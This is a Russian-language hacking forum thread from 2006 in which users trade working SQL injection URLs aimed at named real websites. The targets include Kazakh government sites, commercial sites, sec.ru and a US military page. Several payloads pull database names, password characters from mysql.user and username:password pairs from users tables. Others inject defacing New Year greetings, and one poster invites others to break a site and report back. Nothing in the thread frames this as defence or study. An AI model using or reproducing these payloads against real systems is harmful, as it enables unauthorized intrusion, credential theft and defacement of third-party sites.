29.12.2006, 12:00
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
таблицу подобрать не смог
|
|
|
29.12.2006, 12:05
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
точно такойже сайт
http://www.eyla.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*--
видимо таблицы там одинаковые
|
|
|
|
29.12.2006, 14:07
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Я не врубился, почему, когда я пытаюсь набрать Database(),http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,5,6,7,8/*
меня обламывает и не показывает? Фильтрация?
Последний раз редактировалось Termin@L; 29.12.2006 в 14:09..
|
|
|
|
29.12.2006, 14:37
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
http://www.scangirls.net/foto_pr.php?id=-251%20union%20select%201,2,3,4,AES_DECRYPT(AES_ENC RYPT(DATABASE(),0x71),0x71),6,7,8/*
|
|
|
|
29.12.2006, 14:47
|
|
Участник форума
Регистрация: 09.12.2005
Сообщений: 162
С нами:
10746540
Репутация:
91
|
|
http://www.auzr.kz/index.php?n=76-1
http://www.mit.kz/index.php?p=rofl&id_mm=3&act=2-1
http://www.sana.gov.kz/showarticle.php?lang=rus&id=-2 UNION SELECT 1,2,3,4,5,6,7,8/*
http://www.minagri.kz/news.jsp?param=rus&type=notices¬iceId=2725-1
http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1%20UNION%20SELECT%201,2,3,ascii(substring(passwor d,1,1)),5,6,7,8,9+from+mysql.user/*
 |
|
|
|
29.12.2006, 15:04
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
http://www.politeh.info/polls.php?id=7'+union+select+*+from+users/*
2 blaga  |
|
|
|
30.12.2006, 19:47
|
|
Новичок
Регистрация: 16.01.2006
Сообщений: 24
С нами:
10692545
Репутация:
63
|
|
sec.ru
вот вам нипохек на сек.ру... оракл =\
http://catalog.sec.ru/catalogmgr.cfm?rub=99999'
кто хек раздолбит, пусть отчет кинет в 108117...
|
|
|
|
Sql-injection как способ поздравить с НГ |
30.12.2006, 01:16
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами:
10487223
Репутация:
490
|
|
Sql-injection как способ поздравить с НГ
Вот от меня пару поздравлений в виде скулей
http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,char(60,104,49,62,71,111,117,1 00,105,110,105,32,239,238,231,228,240,224,226,235, 255,229,242,32,226,241,229,245,32,224,247,224,242, 238,226,246,229,226,32,241,32,205,195,60,47,104,49 ,62),null,null,null,null,null,null+from+users/*
[screen]
http://www.khabibullin.kiev.ua/pabl_article_ua.php?page=1&id=-1+union+select+char(60,104,49,62,200,32,242,229,22 5,255,32,247,243,226,224,234,32,241,32,205,238,226 ,251,236,32,195,238,228,238,236,32,41,41,60,47,104 ,49,62),char(60,104,49,62,71,111,117,100,105,110,1 05,60,47,104,49,62)/*
[screen]
_http://gaga.phpnet.us/toolz/chr.php
P.S. форум вставляет пробелы
Последний раз редактировалось Goudini; 30.12.2006 в 01:38..
|
|
|
|
30.12.2006, 10:35
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Спасибо, тебя тожеhttp://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+null,concat(nickname,char(58),passw ord,char(32,32,32,32,209,239,224,241,232,225,238,3 3,32,32,71,111,117,100,105,110,105)),null,null,nul l,null,null,null+from+users+limit+1,2/*
|
|
|
|
01.01.2007, 22:12
|
|
Новичок
Регистрация: 10.11.2006
Сообщений: 24
С нами:
10263974
Репутация:
17
|
|
Blink: http://www.usfk.mil/USFK/contents/viewNews.asp?id=418'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
